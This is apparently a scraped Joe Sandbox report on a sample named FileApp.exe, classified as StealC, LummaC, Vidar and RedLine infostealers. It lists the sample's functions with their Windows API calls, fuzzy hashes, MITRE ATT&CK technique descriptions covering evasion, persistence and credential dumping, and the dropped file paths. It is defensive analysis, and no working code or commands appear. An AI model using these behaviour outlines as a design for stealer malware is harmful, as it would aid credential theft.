RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000000,0057A110), ref: 004429D0

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: EnumOpen__aulldiv
String ID:
API String ID: 525619821-0
Opcode ID: c27f1728e36cb76471378ddd16d4ac63ed1e76203165fc1c0434a88b0dd7d282
Instruction ID: 85d541e9116ab33da9aa386cdd70684b643cdeda032051dc8dc746edfa6ebc84
Opcode Fuzzy Hash: c27f1728e36cb76471378ddd16d4ac63ed1e76203165fc1c0434a88b0dd7d282
Instruction Fuzzy Hash: EE8222B0D042289FEB24CF65C995BEEBBB1BF49304F1081DAE409A7281DB746E85CF55

Function 004213A0 Relevance: 6.3, APIs: 4, Instructions: 284
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__aulldiv.LIBCMT ref: 00421403

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00421448
__aulldiv.LIBCMT ref: 004215B9
RegOpenKeyExA.KERNEL32(80000001,?,?,?,?,?,?,?,?,?,?,00000009,00000000,?,00004D31,00000000), ref: 004215DF

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$Open
String ID:
API String ID: 1164156825-0
Opcode ID: c4e974b3511f806b6b70a4e7b85b6356bd44e7ab7727469545572e265e09e6d5
Instruction ID: 8d473256b244857dd35e3f30be31d4f2c24e72554595d6a52a5c71db9b1671bf
Opcode Fuzzy Hash: c4e974b3511f806b6b70a4e7b85b6356bd44e7ab7727469545572e265e09e6d5
Instruction Fuzzy Hash: 8DC14C70E002189FEB14CFA4DC95BAEBBB6BF98304F54809AE409B7351DB386A45CF55

Function 0042C1F0 Relevance: 6.3, APIs: 4, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000001), ref: 0042C242
__aulldiv.LIBCMT ref: 0042C2B2
__aulldiv.LIBCMT ref: 0042C38F
__aulldiv.LIBCMT ref: 0042C4B5

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$AttributesFile
String ID:
API String ID: 4084128805-0
Opcode ID: 207997357047747877800b6b45617a4d009ae7c3215e72ef9570215f358694e2
Instruction ID: ce5f3bced27452eddc2bb98ccefd4cf2b5ff573b2ab2aaeebd78fa64e932d534
Opcode Fuzzy Hash: 207997357047747877800b6b45617a4d009ae7c3215e72ef9570215f358694e2
Instruction Fuzzy Hash: C7A165B1E00218AFEB14CFA4DC85B9EBBB5FB88314F55816AE908B7381D7386D418F55

Function 0050B480 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0050B160: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050B1B4

InternetCloseHandle.WININET(00000000), ref: 0050B727

Strings

k, xrefs: 0050B651

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Internet$CloseHandleOpen
String ID: k
API String ID: 435140893-140662621
Opcode ID: e094d59ac9d4a7d04ddc064e7388465a3e338f5642c795e951f334936af196fd
Instruction ID: 42c9fde4cd11957ef1b2ac115441db2fbef171dd7b72c4a7b1ab6a6b9c8ee99b
Opcode Fuzzy Hash: e094d59ac9d4a7d04ddc064e7388465a3e338f5642c795e951f334936af196fd
Instruction Fuzzy Hash: 86A1E1B4D00208DFEB14CF98C995BEEBBB5BF48304F248559E405AB381D775AA85CFA0

Function 00432CB0 Relevance: 4.8, APIs: 3, Instructions: 343
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?), ref: 00432E90
__aulldiv.LIBCMT ref: 00432F7D
Sleep.KERNEL32(?), ref: 00433165

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Sleep$__aulldiv
String ID:
API String ID: 3452965286-0
Opcode ID: ace2132d00580b281b39c4554fa5fcf412341dd4867497363e4755b83993030d
Instruction ID: ad71359d21b1ea7acdfe717ba63d6ce495744843f1c1902d34b77e8da881ce3e
Opcode Fuzzy Hash: ace2132d00580b281b39c4554fa5fcf412341dd4867497363e4755b83993030d
Instruction Fuzzy Hash: 89F1D575E04219DFDB14CF98C991BAEBBB2BF88304F14819AE809A7345D734AE81CF55

Function 00434690 Relevance: 3.2, APIs: 2, Instructions: 170COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0043472D
__aulldiv.LIBCMT ref: 004347E7

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: c0ea6080423b19ee5a6b10a03ed2ed1b081b479ed1470579142e34b47b6c2699
Instruction ID: 1564b058c943317488ec31ecae8851a8a77e1bfb7d3f602f25587fbf73e5db61
Opcode Fuzzy Hash: c0ea6080423b19ee5a6b10a03ed2ed1b081b479ed1470579142e34b47b6c2699
Instruction Fuzzy Hash: 55611CB1E00208ABDB14DFA9DC55BEEBBB5FF88304F508129E509BB380DB786945CB55

Function 0050B160 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 255
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050B1B4
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0050B1FF
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0050B2D8

Strings

f.#'", xrefs: 0050B280

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InternetOpen$ConnectHttpRequest
String ID: f.#'"
API String ID: 3864186401-2769528517
Opcode ID: bb44c4014fecb2f8d0895b5343c6ef2997823c7c28379008333dee09edaf4ad3
Instruction ID: 4e75d7b21df17266ad529ee84e2857af0c1fc63a6e21f4bd204107ad56a29a75
Opcode Fuzzy Hash: bb44c4014fecb2f8d0895b5343c6ef2997823c7c28379008333dee09edaf4ad3
Instruction Fuzzy Hash: 9AB1F7B4E00208EBEB14CF94D895BEEBBB5FF48700F208159E515BB281D7799A05CF54

Function 004326E0 Relevance: 4.6, APIs: 3, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00432400: __aulldiv.LIBCMT ref: 004324BC

Part of subcall function 00416D40: std::ios_base::clear.LIBCPMTD ref: 00416E67

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432796

Part of subcall function 004141F0: std::ios_base::clear.LIBCPMTD ref: 00414372

Part of subcall function 00414120: std::ios_base::clear.LIBCPMTD ref: 0041417E

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432881
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004328B2

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_std::ios_base::clear$__aulldiv
String ID:
API String ID: 3845869555-0
Opcode ID: b3194e40e61bfa5e8b6b1860e582bbbe4d118606a06ec74927af5b3cfeac1639
Instruction ID: f4f79e4ab060f1a6b29ec0a47ef0af61526eed19e743f3d41dd6052330df926f
Opcode Fuzzy Hash: b3194e40e61bfa5e8b6b1860e582bbbe4d118606a06ec74927af5b3cfeac1639
Instruction Fuzzy Hash: 0551D2B0D042498BDB18EFA4DA957EEBFB2AF45300F2041AED5056B381D7B95E81CB94

Function 00432400 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 004324BC

Strings

3AQ, xrefs: 0043262E

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: 3AQ
API String ID: 3732870572-744660477
Opcode ID: eae9bdb659fe0bfb059ba77d62d73df616404367f25cbad221e294630f58bd8d
Instruction ID: 2cb4d266360dbc0642f5a31a6f70fa6a74364dfb4eb2fa78be2748bda0a72200
Opcode Fuzzy Hash: eae9bdb659fe0bfb059ba77d62d73df616404367f25cbad221e294630f58bd8d
Instruction Fuzzy Hash: 8DA1F3B0D04258AFDB14CFA8C991BEEBBB1BF48304F1081AED409AB341DB785A85CF55

Function 00556E32 Relevance: 3.3, APIs: 2, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e1eefdcd6b988643dc50133a21d145d6d256a67e92ec7c181cb5fdcd3068a39
Instruction ID: 73156933cfff161ff9b1e33e5c6c2c4d9b5833e2104240ce41839c76589e8386
Opcode Fuzzy Hash: 4e1eefdcd6b988643dc50133a21d145d6d256a67e92ec7c181cb5fdcd3068a39
Instruction Fuzzy Hash: 38B12574A0824AAFDF11CF98E869BAD7FB1BF49305F14415AEC41972A2C7709D49CF60

Function 0042C530 Relevance: 3.2, APIs: 2, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 0042C655
CreateDirectoryA.KERNEL32(00000000,00000000,?,00000009,00000000), ref: 0042C7C8

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CreateDirectory
String ID:
API String ID: 1884557851-0
Opcode ID: dbce70c606edffe6ff99d2a9418128007745ee7e539ca083624a75b802376eef
Instruction ID: dbd322cb482f4199d9ea2b6e0a813daa7047373197920aaef8d754e97a7c12a8
Opcode Fuzzy Hash: dbce70c606edffe6ff99d2a9418128007745ee7e539ca083624a75b802376eef
Instruction Fuzzy Hash: 40A135B1E002189FDB14CFA9D891BEEBBB5BF88304F1480AAE509B7341DB346A45CF55

Function 00413370 Relevance: 3.2, APIs: 2, Instructions: 151COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 004134A2
__fread_nolock.LIBCMT ref: 004134F2

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: acdc21af71e34b4167bb0087f5a1344fbfa4b506e0bada9681c34f798c832b23
Instruction ID: e513ee97933012759f0f9f365e5c8ca0a012862529e9c906fa4e25e33b10b114
Opcode Fuzzy Hash: acdc21af71e34b4167bb0087f5a1344fbfa4b506e0bada9681c34f798c832b23
Instruction Fuzzy Hash: BC617475A00109EFCB04CF98C594AEEBBB2FF88305F20819AE915A7355D735AE81DF54

Function 004141F0 Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00414372

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID:
API String ID: 1443086396-0
Opcode ID: 4197d7bfb916854b7473aedc872d181d189697dd06b22e76e833351e9e37c750
Instruction ID: 8b2e4bb758c6694df06d7454d56db49568dd63ef702087e988a1e22746558291
Opcode Fuzzy Hash: 4197d7bfb916854b7473aedc872d181d189697dd06b22e76e833351e9e37c750
Instruction Fuzzy Hash: 4E519EB4E04249DFCB14CF99D491AEEFBB1BF88310F24815AE915AB395C734A981CF94

Function 00416D40 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00416E67

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: std::ios_base::clear
String ID:
API String ID: 1443086396-0
Opcode ID: 87762820ae8978ad05e2f73bac3d498fdb726493e16dd55bb69849889473b683
Instruction ID: bfac6a0fac6a6ea4b2e39d86bc440937714fda88544c349c66b50e6cbf0834e6
Opcode Fuzzy Hash: 87762820ae8978ad05e2f73bac3d498fdb726493e16dd55bb69849889473b683
Instruction Fuzzy Hash: 0D41C774A04209EFDB04DF99C891BAEBBB1FF48304F118199E515AB391C775AE81CF94

Function 004328C0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000), ref: 0043299A

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: a47fc1130e5f89a04fc8480d7a3e93c0a684e4241e9e96bbd08858ea3c4a8b0f
Instruction ID: ce107d3b7d72fddbc7e3b00c7e019b97f27011eaffc0a70003703e7f9a3107bd
Opcode Fuzzy Hash: a47fc1130e5f89a04fc8480d7a3e93c0a684e4241e9e96bbd08858ea3c4a8b0f
Instruction Fuzzy Hash: 9721A2B4D00109DFCF10DFA5D9859AEBBB1FF88304F14816AD84127395C775AA49CF92

Function 00557321 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00557208,00000000,?,00588A30,0000000C,005572C4,-T,?), ref: 00557377

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 26fa0fa7ec2ab76ab11a0b7f9f927141b622cce5571aa602e23bfcde8f72db97
Instruction ID: 65c9ff3045235c3e9670b1f8b2b620030dd467f50647267c8fe6cc7f4be4ccda
Opcode Fuzzy Hash: 26fa0fa7ec2ab76ab11a0b7f9f927141b622cce5571aa602e23bfcde8f72db97
Instruction Fuzzy Hash: 9D112C325081199ADA2412387C6D77D7F49BB89732F2A0A1BEC18C72D2EE648C8DA250

Function 0054A661 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,?,0054A623,?,?,?,?,?), ref: 0054A69D

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 23e9664b3fb7366f39bb714dfc55e827943dd4001eb63e988844420fa94a86d9
Instruction ID: fa5d4e5063e62752f2b46c650081ae08a44ebef9a59c764caf5573a9c2d447f3
Opcode Fuzzy Hash: 23e9664b3fb7366f39bb714dfc55e827943dd4001eb63e988844420fa94a86d9
Instruction Fuzzy Hash: 9001D632A10119EFDF058F59DC49DEE3F29FB95324B2A0209F811DB291E671ED519B90

Function 0054EEFE Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,0054EEF8,00000000,0054A7CA,?,?,?,0054A7CA,?), ref: 0054EF28

Memory Dump Source

Source File: 00000002.00000002.2419695402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a0e649ebb3790626bc8e793b29a01a06687a967d95ebed008fab1c670a559f55
Instruction ID: 3e0aac365b171d317595ec6c06de3ad8a1b4474c669e4fa575533648fc21b675
Opcode Fuzzy Hash: a0e649ebb3790626bc8e793b29a01a06687a967d95ebed008fab1c670a559f55
Instruction Fuzzy Hash: B7D05E3100410DBBDF043F64DC0E88A3F2DBF50354B444010F90986032EF72999AEA80

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FileApp.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CAAKKFHCFIECAAAKEGCFIEHDAK

C:\ProgramData\CFBFHIEB

Windows Analysis Report
FileApp.exe

